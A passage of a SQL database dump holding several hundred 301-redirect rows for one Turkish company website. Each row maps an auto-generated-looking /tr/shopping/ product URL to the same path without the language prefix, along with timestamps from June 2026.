00:00:00',301),(74558,'https://3s-technologies.com.tr/tr/shopping/beeswax/2716139989.html',NULL,'https://3s-technologies.com.tr/shopping/beeswax/2716139989.html','',1,0,'2026-06-11 06:45:53','0000-00-00 00:00:00',301),(74559,'https://3s-technologies.com.tr/tr/shopping/palster/314671259.html',NULL,'https://3s-technologies.com.tr/shopping/palster/314671259.html','',1,0,'2026-06-11 06:45:55','0000-00-00 00:00:00',301),(74560,'https://3s-technologies.com.tr/tr/shopping/colorblind/485494281.html',NULL,'https://3s-technologies.com.tr/shopping/colorblind/485494281.html','',1,0,'2026-06-11 06:45:58','0000-00-00 00:00:00',301),(74561,'https://3s-technologies.com.tr/tr/shopping/gaddwell/1963433703.html',NULL,'https://3s-technologies.com.tr/shopping/gaddwell/1963433703.html','',1,0,'2026-06-11 06:46:01','0000-00-00 00:00:00',301),(74562,'https://3s-technologies.com.tr/tr/shopping/acetosellae/2657520210.html',NULL,'https://3s-technologies.com.tr/shopping/acetosellae/2657520210.html','',1,0,'2026-06-11 06:46:04','0000-00-00 00:00:00',301),(74563,'https://3s-technologies.com.tr/tr/shopping/centaurium/574122605.html',NULL,'https://3s-technologies.com.tr/shopping/centaurium/574122605.html','',1,0,'2026-06-11 06:46:07','0000-00-00 00:00:00',301),(74564,'https://3s-technologies.com.tr/tr/shopping/eaglesighted/1349313032.html',NULL,'https://3s-technologies.com.tr/shopping/eaglesighted/1349313032.html','',1,0,'2026-06-11 06:46:12','0000-00-00 00:00:00',301),(74565,'https://3s-technologies.com.tr/tr/shopping/baldhead/1436419859.html',NULL,'https://3s-technologies.com.tr/shopping/baldhead/1436419859.html','',1,0,'2026-06-11 06:46:14','0000-00-00 00:00:00',301),(74566,'https://3s-technologies.com.tr/tr/shopping/moonshiner/93745854.html',NULL,'https://3s-technologies.com.tr/shopping/moonshiner/93745854.html','',1,0,'2026-06-11 06:46:17','0000-00-00 00:00:00',301),(74567,'https://3s-technologies.com.tr/tr/shopping/baccivorous/3108100333.html',NULL,'https://3s-technologies.com.tr/shopping/baccivorous/3108100333.html','',1,0,'2026-06-11 06:46:21','0000-00-00 00:00:00',301),(74568,'https://3s-technologies.com.tr/tr/shopping/nematoid/3893014348.html',NULL,'https://3s-technologies.com.tr/shopping/nematoid/3893014348.html','',1,0,'2026-06-11 06:46:23','0000-00-00 00:00:00',301),(74569,'https://3s-technologies.com.tr/tr/shopping/entire/3396227466.html',NULL,'https://3s-technologies.com.tr/shopping/entire/3396227466.html','',1,0,'2026-06-11 06:46:26','0000-00-00 00:00:00',301),(74570,'https://3s-technologies.com.tr/tr/shopping/switched/1736794980.html',NULL,'https://3s-technologies.com.tr/shopping/switched/1736794980.html','',1,0,'2026-06-11 06:46:32','0000-00-00 00:00:00',301),(74571,'https://3s-technologies.com.tr/tr/shopping/uppercase/1919124723.html',NULL,'https://3s-technologies.com.tr/shopping/uppercase/1919124723.html','',1,0,'2026-06-11 06:46:35','0000-00-00 00:00:00',301),(74572,'https://3s-technologies.com.tr/tr/shopping/manovery/1308078988.html',NULL,'https://3s-technologies.com.tr/shopping/manovery/1308078988.html','',1,0,'2026-06-11 06:46:38','0000-00-00 00:00:00',301),(74573,'https://3s-technologies.com.tr/tr/shopping/pomander/1749262692.html',NULL,'https://3s-technologies.com.tr/shopping/pomander/1749262692.html','',1,0,'2026-06-11 06:46:41','0000-00-00 00:00:00',301),(74574,'https://3s-technologies.com.tr/tr/shopping/shines/1973908764.html',NULL,'https://3s-technologies.com.tr/shopping/shines/1973908764.html','',1,0,'2026-06-11 06:46:44','0000-00-00 00:00:00',301),(74575,'https://3s-technologies.com.tr/tr/shopping/bungo/1890728272.html',NULL,'https://3s-technologies.com.tr/shopping/bungo/1890728272.html','',1,0,'2026-06-11 06:46:47','0000-00-00 00:00:00',301),(74576,'https://3s-technologies.com.tr/tr/shopping/chastisable/1932574108.html',NULL,'https://3s-technologies.com.tr/shopping/chastisable/1932574108.html','',1,0,'2026-06-11 06:46:53','0000-00-00 00:00:00',301),(74577,'https://3s-technologies.com.tr/tr/shopping/petitioned/1963819842.html',NULL,'https://3s-technologies.com.tr/shopping/petitioned/1963819842.html','',1,0,'2026-06-11 06:46:55','0000-00-00 00:00:00',301),(74578,'https://3s-technologies.com.tr/tr/shopping/elasmosaurus/2818437296.html',NULL,'https://3s-technologies.com.tr/shopping/elasmosaurus/2818437296.html','',1,0,'2026-06-11 06:46:58','0000-00-00 00:00:00',301),(74579,'https://3s-technologies.com.tr/tr/shopping/virginian/1633397933.html',NULL,'https://3s-technologies.com.tr/shopping/virginian/1633397933.html','',1,0,'2026-06-11 06:47:01','0000-00-00 00:00:00',301),(74580,'https://3s-technologies.com.tr/tr/shopping/amigo/2656308111.html',NULL,'https://3s-technologies.com.tr/shopping/amigo/2656308111.html','',1,0,'2026-06-11 06:47:04','0000-00-00 00:00:00',301),(74581,'https://3s-technologies.com.tr/tr/shopping/nutrication/1823241669.html',NULL,'https://3s-technologies.com.tr/shopping/nutrication/1823241669.html','',1,0,'2026-06-11 06:47:07','0000-00-00 00:00:00',301),(74582,'https://3s-technologies.com.tr/tr/shopping/merlon/1620095829.html',NULL,'https://3s-technologies.com.tr/shopping/merlon/1620095829.html','',1,0,'2026-06-11 06:47:15','0000-00-00 00:00:00',301),(74583,'https://3s-technologies.com.tr/tr/shopping/carved/265144660.html',NULL,'https://3s-technologies.com.tr/shopping/carved/265144660.html','',1,0,'2026-06-11 06:47:17','0000-00-00 00:00:00',301),(74584,'https://3s-technologies.com.tr/tr/shopping/nymphish/243807983.html',NULL,'https://3s-technologies.com.tr/shopping/nymphish/243807983.html','',1,0,'2026-06-11 06:47:20','0000-00-00 00:00:00',301),(74585,'https://3s-technologies.com.tr/tr/shopping/besprent/1877727140.html',NULL,'https://3s-technologies.com.tr/shopping/besprent/1877727140.html','',1,0,'2026-06-11 06:47:23','0000-00-00 00:00:00',301),(74586,'https://3s-technologies.com.tr/tr/shopping/ostler/3542770049.html',NULL,'https://3s-technologies.com.tr/shopping/ostler/3542770049.html','',1,0,'2026-06-11 06:47:26','0000-00-00 00:00:00',301),(74587,'https://3s-technologies.com.tr/tr/shopping/ichnographical/1242578242.html',NULL,'https://3s-technologies.com.tr/shopping/ichnographical/1242578242.html','',1,0,'2026-06-11 06:47:29','0000-00-00 00:00:00',301),(74588,'https://3s-technologies.com.tr/tr/shopping/mondi/1005552178.html',NULL,'https://3s-technologies.com.tr/shopping/mondi/1005552178.html','',1,0,'2026-06-11 06:47:45','0000-00-00 00:00:00',301),(74589,'https://3s-technologies.com.tr/tr/shopping/militarize/3957381161.html',NULL,'https://3s-technologies.com.tr/shopping/militarize/3957381161.html','',1,0,'2026-06-11 06:47:48','0000-00-00 00:00:00',301),(74590,'https://3s-technologies.com.tr/tr/shopping/stibnite/1010745916.html',NULL,'https://3s-technologies.com.tr/shopping/stibnite/1010745916.html','',1,0,'2026-06-11 06:47:51','0000-00-00 00:00:00',301),(74591,'https://3s-technologies.com.tr/tr/shopping/canyon/2443868779.html',NULL,'https://3s-technologies.com.tr/shopping/canyon/2443868779.html','',1,0,'2026-06-11 06:47:54','0000-00-00 00:00:00',301),(74592,'https://3s-technologies.com.tr/tr/shopping/uniqueness/2505712578.html',NULL,'https://3s-technologies.com.tr/shopping/uniqueness/2505712578.html','',1,0,'2026-06-11 06:47:57','0000-00-00 00:00:00',301),(74593,'https://3s-technologies.com.tr/tr/shopping/blomary/336449363.html',NULL,'https://3s-technologies.com.tr/shopping/blomary/336449363.html','',1,0,'2026-06-11 06:48:00','0000-00-00 00:00:00',301),(74594,'https://3s-technologies.com.tr/tr/shopping/rightful/685770891.html',NULL,'https://3s-technologies.com.tr/shopping/rightful/685770891.html','',1,0,'2026-06-11 06:48:09','0000-00-00 00:00:00',301),(74595,'https://3s-technologies.com.tr/tr/shopping/alfenide/2583588824.html',NULL,'https://3s-technologies.com.tr/shopping/alfenide/2583588824.html','',1,0,'2026-06-11 06:48:14','0000-00-00 00:00:00',301),(74596,'https://3s-technologies.com.tr/tr/shopping/disembark/1288828732.html',NULL,'https://3s-technologies.com.tr/shopping/disembark/1288828732.html','',1,0,'2026-06-11 06:48:17','0000-00-00 00:00:00',301),(74597,'https://3s-technologies.com.tr/tr/shopping/censored/2043396418.html',NULL,'https://3s-technologies.com.tr/shopping/censored/2043396418.html','',1,0,'2026-06-11 06:48:20','0000-00-00 00:00:00',301),(74598,'https://3s-technologies.com.tr/tr/shopping/jibbing/3541557950.html',NULL,'https://3s-technologies.com.tr/shopping/jibbing/3541557950.html','',1,0,'2026-06-11 06:48:23','0000-00-00 00:00:00',301),(74599,'https://3s-technologies.com.tr/tr/shopping/boxthorn/3506338977.html',NULL,'https://3s-technologies.com.tr/shopping/boxthorn/3506338977.html','',1,0,'2026-06-11 06:48:26','0000-00-00 00:00:00',301),(74600,'https://3s-technologies.com.tr/tr/shopping/promissive/2473006198.html',NULL,'https://3s-technologies.com.tr/shopping/promissive/2473006198.html','',1,0,'2026-06-11 06:48:35','0000-00-00 00:00:00',301),(74601,'https://3s-technologies.com.tr/tr/shopping/presumable/3008378513.html',NULL,'https://3s-technologies.com.tr/shopping/presumable/3008378513.html','',1,0,'2026-06-11 06:48:37','0000-00-00 00:00:00',301),(74602,'https://3s-technologies.com.tr/tr/shopping/bravo/2664386741.html',NULL,'https://3s-technologies.com.tr/shopping/bravo/2664386741.html','',1,0,'2026-06-11 06:48:40','0000-00-00 00:00:00',301),(74603,'https://3s-technologies.com.tr/tr/shopping/pentastichous/3662011497.html',NULL,'https://3s-technologies.com.tr/shopping/pentastichous/3662011497.html','',1,0,'2026-06-11 06:48:43','0000-00-00 00:00:00',301),(74604,'https://3s-technologies.com.tr/tr/shopping/renne/2287030916.html',NULL,'https://3s-technologies.com.tr/shopping/renne/2287030916.html','',1,0,'2026-06-11 06:48:46','0000-00-00 00:00:00',301),(74605,'https://3s-technologies.com.tr/tr/shopping/ponder/1397171640.html',NULL,'https://3s-technologies.com.tr/shopping/ponder/1397171640.html','',1,0,'2026-06-11 06:48:49','0000-00-00 00:00:00',301),(74606,'https://3s-technologies.com.tr/tr/shopping/methionate/386810338.html',NULL,'https://3s-technologies.com.tr/shopping/methionate/386810338.html','',1,0,'2026-06-11 06:48:54','0000-00-00 00:00:00',301),(74607,'https://3s-technologies.com.tr/tr/shopping/reforger/2074750471.html',NULL,'https://3s-technologies.com.tr/shopping/reforger/2074750471.html','',1,0,'2026-06-11 06:48:56','0000-00-00 00:00:00',301),(74608,'https://3s-technologies.com.tr/tr/shopping/maldon/1696987219.html',NULL,'https://3s-technologies.com.tr/shopping/maldon/1696987219.html','',1,0,'2026-06-11 06:48:59','0000-00-00 00:00:00',301),(74609,'https://3s-technologies.com.tr/tr/shopping/curatorship/3886517901.html',NULL,'https://3s-technologies.com.tr/shopping/curatorship/3886517901.html','',1,0,'2026-06-11 06:49:02','0000-00-00 00:00:00',301),(74610,'https://3s-technologies.com.tr/tr/shopping/denationalize/1528178417.html',NULL,'https://3s-technologies.com.tr/shopping/denationalize/1528178417.html','',1,0,'2026-06-11 06:49:05','0000-00-00 00:00:00',301),(74611,'https://3s-technologies.com.tr/tr/shopping/bedstraw/483732914.html',NULL,'https://3s-technologies.com.tr/shopping/bedstraw/483732914.html','',1,0,'2026-06-11 06:49:08','0000-00-00 00:00:00',301),(74612,'https://3s-technologies.com.tr/tr/shopping/yours/1047176988.html',NULL,'https://3s-technologies.com.tr/shopping/yours/1047176988.html','',1,0,'2026-06-11 06:49:14','0000-00-00 00:00:00',301),(74613,'https://3s-technologies.com.tr/tr/shopping/axinite/811717717.html',NULL,'https://3s-technologies.com.tr/shopping/axinite/811717717.html','',1,0,'2026-06-11 06:49:16','0000-00-00 00:00:00',301),(74614,'https://3s-technologies.com.tr/tr/shopping/oreweed/2588707450.html',NULL,'https://3s-technologies.com.tr/shopping/oreweed/2588707450.html','',1,0,'2026-06-11 06:49:19','0000-00-00 00:00:00',301),(74615,'https://3s-technologies.com.tr/tr/shopping/deluged/3584251986.html',NULL,'https://3s-technologies.com.tr/shopping/deluged/3584251986.html','',1,0,'2026-06-11 06:49:22','0000-00-00 00:00:00',301),(74616,'https://3s-technologies.com.tr/tr/shopping/lagomorpha/2685848336.html',NULL,'https://3s-technologies.com.tr/shopping/lagomorpha/2685848336.html','',1,0,'2026-06-11 06:49:25','0000-00-00 00:00:00',301),(74617,'https://3s-technologies.com.tr/tr/shopping/kairoline/3630074834.html',NULL,'https://3s-technologies.com.tr/shopping/kairoline/3630074834.html','',1,0,'2026-06-11 06:49:29','0000-00-00 00:00:00',301),(74618,'https://3s-technologies.com.tr/tr/shopping/paramorphism/398908794.html',NULL,'https://3s-technologies.com.tr/shopping/paramorphism/398908794.html','',1,0,'2026-06-11 06:49:37','0000-00-00 00:00:00',301),(74619,'https://3s-technologies.com.tr/tr/shopping/valancing/611633804.html',NULL,'https://3s-technologies.com.tr/shopping/valancing/611633804.html','',1,0,'2026-06-11 06:49:41','0000-00-00 00:00:00',301),(74620,'https://3s-technologies.com.tr/tr/shopping/caecias/1665179556.html',NULL,'https://3s-technologies.com.tr/shopping/caecias/1665179556.html','',1,0,'2026-06-11 06:49:44','0000-00-00 00:00:00',301),(74621,'https://3s-technologies.com.tr/tr/shopping/appeasing/2392163733.html',NULL,'https://3s-technologies.com.tr/shopping/appeasing/2392163733.html','',1,0,'2026-06-11 06:49:47','0000-00-00 00:00:00',301),(74622,'https://3s-technologies.com.tr/tr/shopping/accouplement/2301390079.html',NULL,'https://3s-technologies.com.tr/shopping/accouplement/2301390079.html','',1,0,'2026-06-11 06:49:50','0000-00-00 00:00:00',301),(74623,'https://3s-technologies.com.tr/tr/shopping/forcement/573434161.html',NULL,'https://3s-technologies.com.tr/shopping/forcement/573434161.html','',1,0,'2026-06-11 06:49:53','0000-00-00 00:00:00',301),(74624,'https://3s-technologies.com.tr/tr/shopping/bleeding/1301975764.html',NULL,'https://3s-technologies.com.tr/shopping/bleeding/1301975764.html','',1,0,'2026-06-11 06:49:57','0000-00-00 00:00:00',301),(74625,'https://3s-technologies.com.tr/tr/shopping/mizenmast/369443117.html',NULL,'https://3s-technologies.com.tr/shopping/mizenmast/369443117.html','',1,0,'2026-06-11 06:50:03','0000-00-00 00:00:00',301),(74626,'https://3s-technologies.com.tr/tr/shopping/variations/1179868675.html',NULL,'https://3s-technologies.com.tr/shopping/variations/1179868675.html','',1,0,'2026-06-11 06:50:07','0000-00-00 00:00:00',301),(74627,'https://3s-technologies.com.tr/tr/shopping/paradigmatically/3749789276.html',NULL,'https://3s-technologies.com.tr/shopping/paradigmatically/3749789276.html','',1,0,'2026-06-11 06:50:11','0000-00-00 00:00:00',301),(74628,'https://3s-technologies.com.tr/tr/shopping/thrashed/517197767.html',NULL,'https://3s-technologies.com.tr/shopping/thrashed/517197767.html','',1,0,'2026-06-11 06:50:13','0000-00-00 00:00:00',301),(74629,'https://3s-technologies.com.tr/tr/shopping/saularis/610258166.html',NULL,'https://3s-technologies.com.tr/shopping/saularis/610258166.html','',1,0,'2026-06-11 06:50:17','0000-00-00 00:00:00',301),(74630,'https://3s-technologies.com.tr/tr/shopping/favourable/1235637572.html',NULL,'https://3s-technologies.com.tr/shopping/favourable/1235637572.html','',1,0,'2026-06-11 06:50:19','0000-00-00 00:00:00',301),(74631,'https://3s-technologies.com.tr/tr/shopping/brite/2010115652.html',NULL,'https://3s-technologies.com.tr/shopping/brite/2010115652.html','',1,0,'2026-06-11 06:50:23','0000-00-00 00:00:00',301),(74632,'https://3s-technologies.com.tr/tr/shopping/emblematizing/3245640432.html',NULL,'https://3s-technologies.com.tr/shopping/emblematizing/3245640432.html','',1,0,'2026-06-11 06:50:26','0000-00-00 00:00:00',301),(74633,'https://3s-technologies.com.tr/tr/shopping/foolborn/3192945017.html',NULL,'https://3s-technologies.com.tr/shopping/foolborn/3192945017.html','',1,0,'2026-06-11 06:50:28','0000-00-00 00:00:00',301),(74634,'https://3s-technologies.com.tr/tr/shopping/emborder/3559898736.html',NULL,'https://3s-technologies.com.tr/shopping/emborder/3559898736.html','',1,0,'2026-06-11 06:50:32','0000-00-00 00:00:00',301),(74635,'https://3s-technologies.com.tr/tr/shopping/nylghai/4246094782.html',NULL,'https://3s-technologies.com.tr/shopping/nylghai/4246094782.html','',1,0,'2026-06-11 06:50:35','0000-00-00 00:00:00',301),(74636,'https://3s-technologies.com.tr/tr/shopping/actinian/1699675464.html',NULL,'https://3s-technologies.com.tr/shopping/actinian/1699675464.html','',1,0,'2026-06-11 06:50:37','0000-00-00 00:00:00',301),(74637,'https://3s-technologies.com.tr/tr/shopping/briefly/37320894.html',NULL,'https://3s-technologies.com.tr/shopping/briefly/37320894.html','',1,0,'2026-06-11 06:50:41','0000-00-00 00:00:00',301),(74638,'https://3s-technologies.com.tr/tr/shopping/yellowroot/4293079052.html',NULL,'https://3s-technologies.com.tr/shopping/yellowroot/4293079052.html','',1,0,'2026-06-11 06:50:43','0000-00-00 00:00:00',301),(74639,'https://3s-technologies.com.tr/tr/shopping/simous/3066690567.html',NULL,'https://3s-technologies.com.tr/shopping/simous/3066690567.html','',1,0,'2026-06-11 06:50:47','0000-00-00 00:00:00',301),(74640,'https://3s-technologies.com.tr/tr/shopping/perspective/2691124302.html',NULL,'https://3s-technologies.com.tr/shopping/perspective/2691124302.html','',1,0,'2026-06-11 06:50:50','0000-00-00 00:00:00',301),(74641,'https://3s-technologies.com.tr/tr/shopping/dedicatee/1131326964.html',NULL,'https://3s-technologies.com.tr/shopping/dedicatee/1131326964.html','',1,0,'2026-06-11 06:50:52','0000-00-00 00:00:00',301),(74642,'https://3s-technologies.com.tr/tr/shopping/octangularness/84928394.html',NULL,'https://3s-technologies.com.tr/shopping/octangularness/84928394.html','',1,0,'2026-06-11 06:50:56','0000-00-00 00:00:00',301),(74643,'https://3s-technologies.com.tr/tr/shopping/hawkbit/3601082103.html',NULL,'https://3s-technologies.com.tr/shopping/hawkbit/3601082103.html','',1,0,'2026-06-11 06:50:59','0000-00-00 00:00:00',301),(74644,'https://3s-technologies.com.tr/tr/shopping/punitory/3001564474.html',NULL,'https://3s-technologies.com.tr/shopping/punitory/3001564474.html','',1,0,'2026-06-11 06:51:02','0000-00-00 00:00:00',301),(74645,'https://3s-technologies.com.tr/tr/shopping/undersheriff/157003769.html',NULL,'https://3s-technologies.com.tr/shopping/undersheriff/157003769.html','',1,0,'2026-06-11 06:51:05','0000-00-00 00:00:00',301),(74646,'https://3s-technologies.com.tr/tr/shopping/firestone/3950403631.html',NULL,'https://3s-technologies.com.tr/shopping/firestone/3950403631.html','',1,0,'2026-06-11 06:51:08','0000-00-00 00:00:00',301),(74647,'https://3s-technologies.com.tr/tr/shopping/exiling/3057119171.html',NULL,'https://3s-technologies.com.tr/shopping/exiling/3057119171.html','',1,0,'2026-06-11 06:51:10','0000-00-00 00:00:00',301),(74648,'https://3s-technologies.com.tr/tr/shopping/edifier/1328835456.html',NULL,'https://3s-technologies.com.tr/shopping/edifier/1328835456.html','',1,0,'2026-06-11 06:51:14','0000-00-00 00:00:00',301),(74649,'https://3s-technologies.com.tr/tr/shopping/abassi/2929489115.html',NULL,'https://3s-technologies.com.tr/shopping/abassi/2929489115.html','',1,0,'2026-06-11 06:51:17','0000-00-00 00:00:00',301),(74650,'https://3s-technologies.com.tr/tr/shopping/perspicable/3366093995.html',NULL,'https://3s-technologies.com.tr/shopping/perspicable/3366093995.html','',1,0,'2026-06-11 06:51:20','0000-00-00 00:00:00',301),(74651,'https://3s-technologies.com.tr/tr/shopping/drumly/560667879.html',NULL,'https://3s-technologies.com.tr/shopping/drumly/560667879.html','',1,0,'2026-06-11 06:51:23','0000-00-00 00:00:00',301),(74652,'https://3s-technologies.com.tr/tr/shopping/menacingly/408464109.html',NULL,'https://3s-technologies.com.tr/shopping/menacingly/408464109.html','',1,0,'2026-06-11 06:51:31','0000-00-00 00:00:00',301),(74653,'https://3s-technologies.com.tr/tr/shopping/torcher/3033799723.html',NULL,'https://3s-technologies.com.tr/shopping/torcher/3033799723.html','',1,0,'2026-06-11 06:51:36','0000-00-00 00:00:00',301),(74654,'https://3s-technologies.com.tr/tr/shopping/misimprove/2928277000.html',NULL,'https://3s-technologies.com.tr/shopping/misimprove/2928277000.html','',1,0,'2026-06-11 06:51:39','0000-00-00 00:00:00',301),(74655,'https://3s-technologies.com.tr/tr/shopping/distrustfully/3414126825.html',NULL,'https://3s-technologies.com.tr/shopping/distrustfully/3414126825.html','',1,0,'2026-06-11 06:51:42','0000-00-00 00:00:00',301),(74656,'https://3s-technologies.com.tr/tr/shopping/redback/1205794172.html',NULL,'https://3s-technologies.com.tr/shopping/redback/1205794172.html','',1,0,'2026-06-11 06:51:45','0000-00-00 00:00:00',301),(74657,'https://3s-technologies.com.tr/tr/shopping/staking/3747461163.html',NULL,'https://3s-technologies.com.tr/shopping/staking/3747461163.html','',1,0,'2026-06-11 06:51:47','0000-00-00 00:00:00',301),(74658,'https://3s-technologies.com.tr/tr/shopping/duelo/253578326.html',NULL,'https://3s-technologies.com.tr/shopping/duelo/253578326.html','',1,0,'2026-06-11 06:51:51','0000-00-00 00:00:00',301),(74659,'https://3s-technologies.com.tr/tr/shopping/complanate/2225938015.html',NULL,'https://3s-technologies.com.tr/shopping/complanate/2225938015.html','',1,0,'2026-06-11 06:51:54','0000-00-00 00:00:00',301),(74660,'https://3s-technologies.com.tr/tr/shopping/customer/1306728091.html',NULL,'https://3s-technologies.com.tr/shopping/customer/1306728091.html','',1,0,'2026-06-11 06:51:57','0000-00-00 00:00:00',301),(74661,'https://3s-technologies.com.tr/tr/shopping/snugging/2343785545.html',NULL,'https://3s-technologies.com.tr/shopping/snugging/2343785545.html','',1,0,'2026-06-11 06:52:00','0000-00-00 00:00:00',301),(74662,'https://3s-technologies.com.tr/tr/shopping/consimility/2454734486.html',NULL,'https://3s-technologies.com.tr/shopping/consimility/2454734486.html','',1,0,'2026-06-11 06:52:03','0000-00-00 00:00:00',301),(74663,'https://3s-technologies.com.tr/tr/shopping/thrid/905767498.html',NULL,'https://3s-technologies.com.tr/shopping/thrid/905767498.html','',1,0,'2026-06-11 06:52:06','0000-00-00 00:00:00',301),(74664,'https://3s-technologies.com.tr/tr/shopping/joyously/602899854.html',NULL,'https://3s-technologies.com.tr/shopping/joyously/602899854.html','',1,0,'2026-06-11 06:52:09','0000-00-00 00:00:00',301),(74665,'https://3s-technologies.com.tr/tr/shopping/labyrinthiform/4252059176.html',NULL,'https://3s-technologies.com.tr/shopping/labyrinthiform/4252059176.html','',1,0,'2026-06-11 06:52:12','0000-00-00 00:00:00',301),(74666,'https://3s-technologies.com.tr/tr/shopping/steeling/629334184.html',NULL,'https://3s-technologies.com.tr/shopping/steeling/629334184.html','',1,0,'2026-06-11 06:52:15','0000-00-00 00:00:00',301),(74667,'https://3s-technologies.com.tr/tr/shopping/mamas/1985402286.html',NULL,'https://3s-technologies.com.tr/shopping/mamas/1985402286.html','',1,0,'2026-06-11 06:52:18','0000-00-00 00:00:00',301),(74668,'https://3s-technologies.com.tr/tr/shopping/excluding/2266957859.html',NULL,'https://3s-technologies.com.tr/shopping/excluding/2266957859.html','',1,0,'2026-06-11 06:52:21','0000-00-00 00:00:00',301),(74669,'https://3s-technologies.com.tr/tr/shopping/drooling/2109837488.html',NULL,'https://3s-technologies.com.tr/shopping/drooling/2109837488.html','',1,0,'2026-06-11 06:52:24','0000-00-00 00:00:00',301),(74670,'https://3s-technologies.com.tr/tr/shopping/trefoiled/2464239108.html',NULL,'https://3s-technologies.com.tr/shopping/trefoiled/2464239108.html','',1,0,'2026-06-11 06:52:27','0000-00-00 00:00:00',301),(74671,'https://3s-technologies.com.tr/tr/shopping/caninal/2211403162.html',NULL,'https://3s-technologies.com.tr/shopping/caninal/2211403162.html','',1,0,'2026-06-11 06:52:30','0000-00-00 00:00:00',301),(74672,'https://3s-technologies.com.tr/tr/shopping/vilifier/1497881407.html',NULL,'https://3s-technologies.com.tr/shopping/vilifier/1497881407.html','',1,0,'2026-06-11 06:52:33','0000-00-00 00:00:00',301),(74673,'https://3s-technologies.com.tr/tr/shopping/pedality/403711782.html',NULL,'https://3s-technologies.com.tr/shopping/pedality/403711782.html','',1,0,'2026-06-11 06:52:36','0000-00-00 00:00:00',301),(74674,'https://3s-technologies.com.tr/tr/shopping/indifference/2080026437.html',NULL,'https://3s-technologies.com.tr/shopping/indifference/2080026437.html','',1,0,'2026-06-11 06:52:39','0000-00-00 00:00:00',301),(74675,'https://3s-technologies.com.tr/tr/shopping/gerboa/2809035552.html',NULL,'https://3s-technologies.com.tr/shopping/gerboa/2809035552.html','',1,0,'2026-06-11 06:52:42','0000-00-00 00:00:00',301),(74676,'https://3s-technologies.com.tr/tr/shopping/manurable/3638890996.html',NULL,'https://3s-technologies.com.tr/shopping/manurable/3638890996.html','',1,0,'2026-06-11 06:52:45','0000-00-00 00:00:00',301),(74677,'https://3s-technologies.com.tr/tr/shopping/spurned/400120909.html',NULL,'https://3s-technologies.com.tr/shopping/spurned/400120909.html','',1,0,'2026-06-11 06:52:48','0000-00-00 00:00:00',301),(74678,'https://3s-technologies.com.tr/tr/shopping/sendal/33684581.html',NULL,'https://3s-technologies.com.tr/shopping/sendal/33684581.html','',1,0,'2026-06-11 06:52:51','0000-00-00 00:00:00',301),(74679,'https://3s-technologies.com.tr/tr/shopping/mailboat/470213497.html',NULL,'https://3s-technologies.com.tr/shopping/mailboat/470213497.html','',1,0,'2026-06-11 06:52:56','0000-00-00 00:00:00',301),(74680,'https://3s-technologies.com.tr/tr/shopping/pterois/3753425557.html',NULL,'https://3s-technologies.com.tr/shopping/pterois/3753425557.html','',1,0,'2026-06-11 06:52:57','0000-00-00 00:00:00',301),(74681,'https://3s-technologies.com.tr/tr/shopping/grasshopper/1838089031.html',NULL,'https://3s-technologies.com.tr/shopping/grasshopper/1838089031.html','',1,0,'2026-06-11 06:53:00','0000-00-00 00:00:00',301),(74682,'https://3s-technologies.com.tr/tr/shopping/coppled/1157761326.html',NULL,'https://3s-technologies.com.tr/shopping/coppled/1157761326.html','',1,0,'2026-06-11 06:53:03','0000-00-00 00:00:00',301),(74683,'https://3s-technologies.com.tr/tr/shopping/innocent/2349768267.html',NULL,'https://3s-technologies.com.tr/shopping/innocent/2349768267.html','',1,0,'2026-06-11 06:53:06','0000-00-00 00:00:00',301),(74684,'https://3s-technologies.com.tr/tr/shopping/repine/232683060.html',NULL,'https://3s-technologies.com.tr/shopping/repine/232683060.html','',1,0,'2026-06-11 06:53:09','0000-00-00 00:00:00',301),(74685,'https://3s-technologies.com.tr/tr/shopping/innervation/4191752168.html',NULL,'https://3s-technologies.com.tr/shopping/innervation/4191752168.html','',1,0,'2026-06-11 06:53:12','0000-00-00 00:00:00',301),(74686,'https://3s-technologies.com.tr/tr/shopping/bellygod/828876124.html',NULL,'https://3s-technologies.com.tr/shopping/bellygod/828876124.html','',1,0,'2026-06-11 06:53:16','0000-00-00 00:00:00',301),(74687,'https://3s-technologies.com.tr/tr/shopping/papacy/68344028.html',NULL,'https://3s-technologies.com.tr/shopping/papacy/68344028.html','',1,0,'2026-06-11 06:53:18','0000-00-00 00:00:00',301),(74688,'https://3s-technologies.com.tr/tr/shopping/judgmental/2107672898.html',NULL,'https://3s-technologies.com.tr/shopping/judgmental/2107672898.html','',1,0,'2026-06-11 06:53:21','0000-00-00 00:00:00',301),(74689,'https://3s-technologies.com.tr/tr/shopping/pioned/3285448193.html',NULL,'https://3s-technologies.com.tr/shopping/pioned/3285448193.html','',1,0,'2026-06-11 06:53:24','0000-00-00 00:00:00',301),(74690,'https://3s-technologies.com.tr/tr/shopping/warbled/937609782.html',NULL,'https://3s-technologies.com.tr/shopping/warbled/937609782.html','',1,0,'2026-06-11 06:53:27','0000-00-00 00:00:00',301),(74691,'https://3s-technologies.com.tr/tr/shopping/extendedly/2088596880.html',NULL,'https://3s-technologies.com.tr/shopping/extendedly/2088596880.html','',1,0,'2026-06-11 06:53:30','0000-00-00 00:00:00',301),(74692,'https://3s-technologies.com.tr/tr/shopping/parashoth/2715837668.html',NULL,'https://3s-technologies.com.tr/shopping/parashoth/2715837668.html','',1,0,'2026-06-11 06:53:34','0000-00-00 00:00:00',301),(74693,'https://3s-technologies.com.tr/tr/shopping/viola/2813787847.html',NULL,'https://3s-technologies.com.tr/shopping/viola/2813787847.html','',1,0,'2026-06-11 06:53:37','0000-00-00 00:00:00',301),(74694,'https://3s-technologies.com.tr/tr/shopping/compartmental/93057410.html',NULL,'https://3s-technologies.com.tr/shopping/compartmental/93057410.html','',1,0,'2026-06-11 06:53:40','0000-00-00 00:00:00',301),(74695,'https://3s-technologies.com.tr/tr/shopping/tracing/2221349227.html',NULL,'https://3s-technologies.com.tr/shopping/tracing/2221349227.html','',1,0,'2026-06-11 06:53:42','0000-00-00 00:00:00',301),(74696,'https://3s-technologies.com.tr/tr/shopping/impatronizing/2981881323.html',NULL,'https://3s-technologies.com.tr/shopping/impatronizing/2981881323.html','',1,0,'2026-06-11 06:53:50','0000-00-00 00:00:00',301),(74697,'https://3s-technologies.com.tr/tr/shopping/systematist/1839464669.html',NULL,'https://3s-technologies.com.tr/shopping/systematist/1839464669.html','',1,0,'2026-06-11 06:53:55','0000-00-00 00:00:00',301),(74698,'https://3s-technologies.com.tr/tr/shopping/hindermost/872665508.html',NULL,'https://3s-technologies.com.tr/shopping/hindermost/872665508.html','',1,0,'2026-06-11 06:53:58','0000-00-00 00:00:00',301),(74699,'https://3s-technologies.com.tr/tr/shopping/impropriety/2917934932.html',NULL,'https://3s-technologies.com.tr/shopping/impropriety/2917934932.html','',1,0,'2026-06-11 06:54:01','0000-00-00 